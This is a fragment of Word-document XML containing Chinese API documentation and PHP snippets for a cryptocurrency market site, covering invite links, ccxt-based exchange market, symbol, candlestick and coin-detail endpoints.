    </w:p>
    <w:p w14:paraId="27F83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as_update' =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7879C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atest_version' =&gt; $latest_version,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728BF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72D3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local_version != '' &amp;&amp; $local_version == $latest_version['version']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16376E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has_update'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A37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879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sult);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8A3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DA7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7615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index/invitation </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取邀请好友链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69298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邀请好友链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A29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通用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36063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75053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4F953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nvitation_link  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邀请地址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86BC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qrcode_link      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>二维码地址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF09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62EFC2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Error {String} errcode            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误状态码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23032A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728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vitation()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D77C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BFF6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2712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vitation_link' =&gt; 'http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3FE7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rcode_link' =&gt; '/public/style/index/img/qrcode.gif',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8FD5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056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362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930A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B629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014C8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70CCF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Hook;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0211F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064F4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ccxt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB9F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arket extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C730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44F4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0F8F34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03EDE8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0C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2720F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08B2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63AFD7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EE2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2A3F3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796C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683C3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9A8F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6974F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4652F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780D3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2DC10C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61FC12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1E646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0D9EA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1B2C7E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14F2B5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3E1E9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36E290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2CBBD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92EB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6B53E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0BF07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2011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47CE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6DAD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54147A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30BC6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46A13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2749E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3EE6F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3D0B28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1B21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E25E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645F9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1573A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12263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5F28BB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8B27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323DC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078F33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C6C1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F5F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0A10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92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2F955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603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40A6C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59BAB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639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A53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6B6F2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CFF2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986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314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A27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 </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持的交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B30D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支持的交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA30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07BC2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81D5B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5BA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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF93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cxt\Exchange::$exchanges);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED378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B183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14A4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_markets </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所市场数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF07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交易所市场数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509AB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5A5A7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C164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5D4E5A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F3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_markets()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701D0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F26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029783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099D7E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7A127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490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368159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1B443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24511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arkets = $exchange-&gt;load_markets();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5687B1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xchange-&gt;markets);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB7A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BB0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FC31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_symbols </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所交易的交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F96D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交易所交易的交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DBD2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342FA6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321A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5CB1E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base </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302B6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975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_symbols()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255973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BAAE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5BCEA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2175E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4380C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796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51DFD1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se=input('post.base');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128469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7CC0F0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10DCE0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04AAE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ter=function($symbol) use ($base){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA84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ttern="/^$base\/\w+/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3947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preg_match($pattern, $symbol)?$symbol:null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63685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1254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base)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3625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ray_values(array_filter(array_map($filter, $exchange-&gt;symbols))));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074DC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xchange-&gt;symbols);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E769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3F7B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7522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_currencies </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所所在国家</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC20F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交易所所在国家</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D43B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6106F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393B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3547F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14E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_currencies()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB8B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0AB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586218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464E0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3A3005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4D9F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 'binance','org\Filter::safeHtml');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE48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3D497D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474DE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135640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xchange-&gt;currencies);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF1A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BA5A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33CB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ohlcv </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>蜡烛图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E186E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Name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>蜡烛图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A45C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01A82E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BF973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1BD16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ymbol   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C68E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meframe   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间框架（需要先调用【返回交易所时间框架】获取交易所支持哪些时间框架）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FACD2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object </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>蜡烛</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> [UTC</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间戳</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单位：毫秒</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>开盘价格</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最高价格</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最低价格</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>收盘价格</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易量（已基准货币计量）</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540CB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6BD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ohlcv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5073B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5EC7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0928B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7B470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6F54F9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F07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0845F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input('post.symbol');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0076C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frame = input('post.timeframe');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6888BD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60DCB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array (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E325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ableRateLimit' =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7C2D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FBD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12BA52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xchange-&gt;has['fetchOHLCV']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FBB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xchange-&gt;fetch_ohlcv ($symbol, $timeframe));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24268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exchange-&gt;markets as $symbol =&gt; $market) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E79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usleep ($exchange-&gt;rateLimit * 1000); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1B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return json($exchange-&gt;fetch_ohlcv ($symbol, '1M')); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C22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C5B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B14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1AEC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00AE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oclhv </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>蜡烛图（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>oclhv</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002E3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蜡烛图（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>oclhv</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09008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73C9DE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27BAF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7E1B8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ymbol   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0036C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meframe   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间框架（需要先调用【返回交易所时间框架】获取交易所支持哪些时间框架）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514587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7540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oclhv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74299A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201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196DA3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1E214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7EC98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158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189C7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input('post.symbol');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B25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frame = input('post.timeframe');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0808B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xchange_id = '\\ccxt\\' . $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521D8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array (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52069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ableRateLimit' =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62052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C67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0806FD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xchange-&gt;has['fetchOHLCV']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41E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hlcv=$exchange-&gt;fetch_ohlcv ($symbol, $timeframe);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5EB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hange_of_position=function($arr){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428DC3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arr[0],$arr[1],$arr[4],$arr[3],$arr[2],$arr[5]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D1F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ray_values($ret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD732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C21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ray_map($change_of_position, $ohlcv));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB23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3C5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888D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BA39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_quote </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回交易所的报价货币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53382E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返回交易所的报价货币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C0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3DCFE5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BB300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4D2B8E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011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_quote()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1383D0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D41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5EAFCE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19A37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2F25A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8C4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3853E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06554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0FDA4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4464B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_quote = function ($symbol) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CE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 = explode('/', $symbol);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45822D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r[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E238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A7FE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ote = array_map($symbol_quote, $exchange-&gt;symbols);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE61A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ote_unique = array_unique($quote);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E6E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ray_values($quote_unique);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F34E2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F2A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64D9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coin_info </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF8B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虚拟币详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD537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77CD8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2B98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42451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in </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C2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id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B1E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urrency </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2447A9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ullname </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C347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con </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334D8B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ullname_zh </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币中文全称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F059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String} introduction_zh </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中文简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA088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lease_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C91D5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lease_price </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布价格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BCBA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white_paper </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>白皮书</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703E6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block_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区块链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F68B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official_website </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>官网</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42A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irculation </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>流通量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D025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otal_circulation </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发行量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E29C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ollow_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加入自选数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C18E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kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36858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follow </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已经关注该虚拟币：</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CE8E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public_blockchain </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>公链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFCD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_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上架交易所数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA6B8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exchange </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090533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exchange.id id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279A8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name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCAA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exchange </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标识（其他接口</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exchange</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数使用这个字段）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117869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logo logo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537EF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details </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
